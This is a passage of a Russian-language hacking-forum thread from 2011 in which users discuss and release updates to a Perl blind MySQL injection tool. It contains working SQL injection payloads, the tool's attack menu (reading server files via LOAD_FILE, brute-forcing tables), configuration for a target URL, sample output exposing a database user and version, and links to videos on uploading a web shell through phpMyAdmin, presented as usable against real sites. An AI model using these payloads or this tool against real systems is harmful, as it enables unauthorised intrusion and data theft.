Старый 06.05.2011, 10:48   #21
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

Цитата:
group_concat(concat_ws(0x3a,table_schema,table_nam e,column_name)) ... like
поняль

Цитата:
Blind inj get DB-names from information_schema.schemata -- тянет information_schema
приняль

Цитата:
В название таблицы мне не дали впихать спецсимволы
не поняль, но подумаю) Если речь идет о where table_name= - то там всё поддерживается, если from - то тут не вогнал, там же вроде только имя таблы можно в чистом виде (ну еще можно имя_бд.имя_таблы), не?

Цитата:
Мне показалось что при умирании прокси она не стала листать дальше список
так и есть, работает с первой рабочей проксей, динамически прямо во время работы прокси не меняется, в случае смерти текущей

Цитата:
Blind System information -- тянет кучу ненужной инфы
а как сделать? По выбору - типо версия и бд, или как? Ну в общем понятно - сделать список, что можно, и тянуть по выбору по одному параметру
Pashkela вне форума   Ответить с цитированием
Старый 06.05.2011, 11:14   #22
Jokester
 
Аватар для Jokester
 
Регистрация: 01.07.2010
Сообщений: 250
Репутация: 155
По умолчанию

Цитата:
Сообщение от Pashkela Посмотреть сообщение
если from - то тут не вогнал, там же вроде только имя таблы можно в чистом виде (ну еще можно имя_бд.имя_таблы), не?
По сути да, но есть варианты. Если хочешь в асе поясню )
Цитата:
Сообщение от Pashkela Посмотреть сообщение
так и есть, работает с первой рабочей проксей, динамически прямо во время работы прокси не меняется, в случае смерти текущей
По этому поводу я тебе не советчик, кодер из меня никакой, единственное что, вот http://forum.antichat.ru/thread97092.html сканер от eLWAux, если не ошибаюсь он работает с проксилистом так как нужно и при умирании листает до живого

Цитата:
Сообщение от Pashkela Посмотреть сообщение
а как сделать? По выбору - типо версия и бд, или как? Ну в общем понятно - сделать список, что можно, и тянуть по выбору по одному параметру
Если будет произвольный запрос, то этот пункт автоматом устранится. Просто запрос должен уметь схавать на версии колонки\таблицы\базы то что ему дадут. Тоесть например:

Введите колонку: concat_ws(0x3a,User(),Database(),Version())
Введите таблицу: Enter

И поехали. А список дополнительный мне кажется будет много пунктов, да и не за чем он, но это тебе виднее конечно.
__________________
------------------
Jokester вне форума   Ответить с цитированием
Старый 08.05.2011, 00:30   #23
snake
 
Регистрация: 05.07.2010
Сообщений: 173
Репутация: 12
По умолчанию

сделай плиз,чтоб сразу сохранял каждый символ выведенный,а не потом,когда закончит всю работу. =(
snake вне форума   Ответить с цитированием
Старый 08.05.2011, 00:48   #24
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

Цитата:
Сообщение от snake Посмотреть сообщение
сделай плиз,чтоб сразу сохранял каждый символ выведенный,а не потом,когда закончит всю работу. =(
так и делает, пишет прямо во время работы, под бубунтой в режиме онлайн, под виндами почему-то только после
Pashkela вне форума   Ответить с цитированием
Старый 08.05.2011, 13:11   #25
.Slip
 
Аватар для .Slip
 
Регистрация: 01.07.2010
Сообщений: 49
По умолчанию

Цитата:
Сообщение от Pashkela Посмотреть сообщение
так и делает, пишет прямо во время работы, под бубунтой в режиме онлайн, под виндами почему-то только после
В начале скрипта поставь $|++, у тебя это зачем то по сабам раскидано
.Slip вне форума   Ответить с цитированием
Старый 08.05.2011, 20:27   #26
snake
 
Регистрация: 05.07.2010
Сообщений: 173
Репутация: 12
По умолчанию

Паш,не пишет,проверено на куче серваков никсовых(
snake вне форума   Ответить с цитированием
Старый 01.06.2011, 18:44   #27
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

Кому интересно - куча какого-то видео по тулзе, кто автор - хз

https://www.ashiyane.org/forums/showthread.php?t=19185

вроде как пользоваться на риал сайтах


http://www.youtube.com/watch?v=Kn_Vxh_rlH4


http://www.video.xaknet.ru/upload/files/Zalivka_shella_v_phpmyadmin.rar


Последний раз редактировалось Pashkela; 22.10.2011 в 20:36..
Pashkela вне форума   Ответить с цитированием
Старый 04.06.2011, 19:13   #28
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

update - произвольный запрос в режиме Blind Mysql Injection:

Цитата:
Choose mode:
----------
[1] Blind System information
[2] Blind inj get DB-names from information_schema.schemata
[3] Blind inj get tables from DB-name
[4] <<< Blind ANY QUERY >>>
[5] Blind inj get column_name from tables from DB-name
[6] Blind inj get LOAD_FILE (file_priv = Y)
[7] Blind BRUTE LOAD_FILE log/conf files (file_priv = Y)
[8] Blind Get tables from information_schema (current DB)
[9] Blind Get column_name from table (current DB)
[10] Blind Get data from columns
[11] Blind Brute MySql4 for tables & columns
[12] Main menu
----------
4
Your choice: 4
-----------------------------------------
Enter your query, example - concat_ws(0x3a,table_schema,table_name)

concat_ws(0x3a,User(),Database(),Version())


Enter condition, without LIMIT [auto count]!!! Example: +from+information_schema.tables+where+table_name+l ike+0x7573657273 (if NOT- press ENTER):


---------------------------------------------------------------------------------------------------------------------------------------
your query: (select+concat_ws(0x3a,User(),Database(),Version() ))
---------------------------------------------------------------------------------------------------------------------------------------
Count records for your answer[length]:1
1
------------------------------------------------------
Count records for your answer[value]:1
--------------------------------------------------------
Sat Jun 4 19:04:51 2011
-----------------------------------
Request method - GET
Threads - 10
Proxy - no
----------------------
Answer[length]:43

-----------------------------------
Answer limit 1,1 ---> root@localhost:joomla1518:5.1.37-1ubuntu5.5
-----------------------------------
Saved in z_localhost.txt
-----------------------------------------
соответственно два новых параметра в коде:

88:$bl_your_query = ""; #example - concat_ws(0x3a,table_schema,table_name)
89:$bl_from = "";#without LIMIT [auto count]!!! Example: +from+information_schema.tables+where+table_name+l ike+0x7573657273

можно заполнять в коде, можно в терминале (если в терминале - ограничения на спецсимволы, пробелы(надо будет ставить "+"), если в скрипте - никаких ограничений на спецсимволы и etc.)

автоподсчет кол-ва записей в возвращаемом ответе на любой запрос

автооформление вашего запроса (select(ваш_запрос)ваше_условиe )

если нет условия (from) - в коде просто оставить "", в терминале просто нажать ENTER

если кол-во записей в ответе будет > 1 - автоматически вставится LIMIT!

Скачать файл toolza_last.zip

Последний раз редактировалось Pashkela; 25.06.2011 в 20:14..
Pashkela вне форума   Ответить с цитированием
Старый 04.06.2011, 21:08   #29
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

update - подарок экспертам ^_^

возможность работать в Blind Mysql Injection в режиме произвольного запроса (п.4) без пробелов!/no spaces! Обязательное условие - запрос должен быть составлен таким образом, чтобы кол-во возвращаемых записей в ответе было = 1, иначе идет автодобавление LIMIT при считывании данных

пример:

http://localhost/user4.php?lol=62'and(mid(version(),1,1)=5)and(1='

Цитата:
$bl_mode = 1;
$bl_url = "http://localhost/user4.php?lol=62'and"; # url
$bl_filtr = "and(1='"; # close SQL
$bl_plus = ""; # /**/,%20,%2b & etc.
$bl_error = 'Administrator'; # Текст идентификатор правильного/неправильного запроса | Message when wrong/right query
$bl_error_type = 1;
Скачать файл toolza_last.zip

PS: для того, чтобы понять, что происходит (если вдруг не получается по каким-либо причинам), то - строчка 12:

$test_mode = 1;

и ваш КАЖДЫЙ запрос будет показан полностью, каждая Ваша попытка что-либо сделать будет видна - что и как, FALSE/TRUE

скачать новую версию можно в первом посте темы / you can download it from the first post of this thread

Последний раз редактировалось Pashkela; 25.06.2011 в 21:32..
Pashkela вне форума   Ответить с цитированием
Старый 20.07.2011, 04:24   #30
AD0
 
Регистрация: 07.06.2011
Сообщений: 3
Репутация: 0
По умолчанию

сделайте gui %)
AD0 вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot